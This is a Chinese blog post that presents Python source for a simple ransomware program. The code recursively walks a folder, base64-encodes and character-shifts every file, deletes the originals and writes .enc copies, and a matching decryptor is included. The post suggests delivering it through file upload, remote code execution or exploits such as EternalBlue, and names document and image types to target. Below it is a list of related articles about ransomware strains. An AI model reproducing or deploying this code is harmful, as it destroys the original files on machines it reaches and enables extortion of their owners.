1. Toy模板网首页
  2. > Toy博客

Python实现简单的勒索病毒

9月前 作者:yb0os1 分类:Toy博客 阅读(28) 违法举报

这篇具有很好参考价值的文章主要介绍了Python实现简单的勒索病毒。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

python实现勒索病毒

勒索病毒一种:将文件以base64字符串形式读取,然后对字符串进行加密(加密方式任取 只要可以解密即可)
问题:怎么在目标主机运行勒索病毒?
首先可以理由文件上传、远程代码执行、一些已知的漏洞等
例如著名的wannacry勒索病毒基于Windows系统永恒之蓝的漏洞文章来源地址https://www.toymoban.com/news/detail-511095.html

# 对一个文件进行勒索,怎么对文件夹进行勒索? --> os模块下的遍历目录 listdir
# 联系:对某些目录下关键文件:word xls docx ppt pptx rar jpg png txt
import base64,os

def encrypt(filepath):
    with open(filepath,mode='rb') as file:
        data = file.read()
    source = base64.b64encode(data).decode()
    # 对字符串加密 ascii码右移5位
    result=''
    for i in source:
        if ord(i) in range(97,123) or ord(i) in range(65,91):
            result+=chr(ord(i)+5)
        else:
            result+=i
    os.remove(filepath)
    with open(filepath+'.enc',mode='w') as file:
        file.write(result)

def decrypt(filepath):
    with open(filepath,mode='r') as file:
        data = file.read()
    result=''
    for i in data:
        if ord(i) in range(102, 128) or ord(i) in range(70, 96):
            result += chr(ord(i) - 5)
        else:
            result += i

    result = base64.b64decode(result)
    os.remove(filepath)
    with open(filepath.replace('.enc',''),mode='wb') as file:
        file.write(result)


def dir_crypt(dirpath,type='encode'):
    dirs = os.listdir(dirpath)
    for filename in dirs:
        filename = os.path.join(dirpath, filename)
        if os.path.isdir(filename):
            dir_crypt(filename,type)
        else:
            if type=='encode':
                encrypt(filename)
            elif type=='decode':
                decrypt(filename)
            else:
                raise Exception("type error")
if __name__ == '__main__':
    # encrypt('./test.png')
    # decrypt('./test.png.enc')
    # dir_crypt('.\\name')
    dir_crypt('.\\name',type='decode')

到了这里,关于Python实现简单的勒索病毒的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

分享到:
领支付宝红包 赞助服务器费用

相关文章

  • .Mkp勒索病毒:防止.mkp勒索病毒攻击的有效方法

    引言: 随着科技的进步,勒索病毒成为网络安全领域的一大威胁,其中mkp勒索病毒是近期引起关注的一种。该病毒通过加密用户的数据文件,迫使受害者支付赎金以获取解密密钥。在本文中,我们将深入介绍mkp勒索病毒,以及如何有效恢复被其加密的数据文件,并提供一系列

    2024年01月21日
    浏览(45)

  • .pings勒索病毒的威胁:如何应对.pings勒索病毒的突袭?

    引言: 在网络安全领域,.pings勒索病毒一直是不断演变的威胁之一。其变种的不断出现使得对抗这一数字威胁变得更加复杂。本节将深入剖析.pings勒索病毒变种的出现,以更好地理解其威胁性质和对策。如果受感染的数据确实有恢复的价值与必要性,您可添加我们的技术服务

    2024年01月20日
    浏览(46)
  • 勒索病毒最新变种.halo勒索病毒来袭,如何恢复受感染的数据?

    勒索病毒最新变种.halo勒索病毒来袭,如何恢复受感染的数据?

    摘要: .halo勒索病毒已成为数字世界中的威胁,通过高级加密技术将文件锁定,并要求支付赎金。本文91数据恢复将深入介绍.halo勒索病毒的工作原理,提供解锁被感染文件的方法,以及探讨如何有效预防这一威胁。如果您正在经历勒索病毒数据恢复的困境,我们愿意与您分享

    2024年02月09日
    浏览(39)
  • 勒索病毒最新变种.faust勒索病毒来袭,如何恢复受感染的数据?

    勒索病毒最新变种.faust勒索病毒来袭,如何恢复受感染的数据?

    引言: 随着我们进入数字化时代,数据的重要性变得愈发显著,而网络安全威胁也日益增加。.faust勒索病毒是其中一种备受恶意分子钟爱的危险工具,它通过加密用户文件并勒索高额赎金来对个人和组织发起攻击。本文将深入探讨.faust勒索病毒的威胁,包括其工作原理、如何

    2024年02月21日
    浏览(44)
  • 勒索病毒频发,信息安全事件如何破 --记两次勒索病毒数据恢复实例

    勒索病毒频发,信息安全事件如何破 --记两次勒索病毒数据恢复实例

    记录两次客户中勒索病毒恢复的情况。 2020年5月在公众号‘成文数科’写的文章,现在安全事故愈发频繁。故重新贴到CSDN来 勒索病毒的前世今生 2017年4月14日晚,黑客团体Shadow Brokers公布“永恒之蓝”工具,该工具可利用Windows系统的共享文件服务漏洞获取系统最高权限。不久

    2024年02月09日
    浏览(39)

  • Mallox勒索病毒最新变种.malox勒索病毒来袭,如何恢复受感染的数据?

    Mallox勒索病毒是一种针对计算机系统的恶意软件,能够加密受感染计算机上的文件。最近,新的Mallox病毒变种.malox勒索病毒被发现并引起了关注,.malox勒索病毒这个后缀已经是Mallox勒索病毒家族的第十几个升级变种了,这个后缀的加密占比更高,导致数据的修复难度再次升级

    2024年02月06日
    浏览(41)
  • 计算机服务器中了locked勒索病毒怎么处理,locked勒索病毒解密流程步骤

    计算机服务器中了locked勒索病毒怎么处理,locked勒索病毒解密流程步骤

    随着网络技术的不断发展,越来越多的企业走向了数字化办公模式,利用网络可以开展各项工作业务,网络也为企业的生产运营发展带来了极大便利,大大加快了生产效率,但随之而来的网络数据安全问题成为众多企业关心的主要话题。近日,云天数据恢复中心接到多家企业

    2024年04月29日
    浏览(36)
  • 企业计算机服务器中了rmallox勒索病毒怎么办,rmallox勒索病毒解密流程

    企业计算机服务器中了rmallox勒索病毒怎么办,rmallox勒索病毒解密流程

    对于众多的企业来说,通过网络开展各项工作业务已经成为常态,网络为企业的生产运营提供了极大便利,也大大加快了企业发展的步伐,但众多企业越来越重视企业发展中的核心数据安全问题。近期,云天数据恢复中心接到众多企业的求助,企业的计算机服务器遭到了rma

    2024年04月29日
    浏览(38)
  • 计算机服务器中了helper勒索病毒怎么办,helper勒索病毒解密流程步骤

    计算机服务器中了helper勒索病毒怎么办,helper勒索病毒解密流程步骤

    随着网络技术在企业中的不断应用,越来越多的企业离不开网络,网络为企业提供了极大便利,大大提升了生产运营效率,由此而产生的网络数据安全问题也成为了企业关心的主要话题。近期,云天数据恢复中心接到多家企业的求助,企业的计算机服务器遭到了helper勒索病毒

    2024年04月25日
    浏览(40)
  • 企业计算机服务器中了rmallox勒索病毒怎么办?Rmallox勒索病毒解密流程工具

    企业计算机服务器中了rmallox勒索病毒怎么办?Rmallox勒索病毒解密流程工具

    在网络飞速发展的时代,企业离不开网络,网络为企业的生产运营提供了极大便利,加快了企业进步的步伐,依靠网络可以开展各项工作业务,通过网络数据整合,可以更方便企业办公。网络在为企业提供便利的同时也为企业的数据安全带来严重威胁。近期,云天数据恢复中

    2024年04月27日
    浏览(36)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包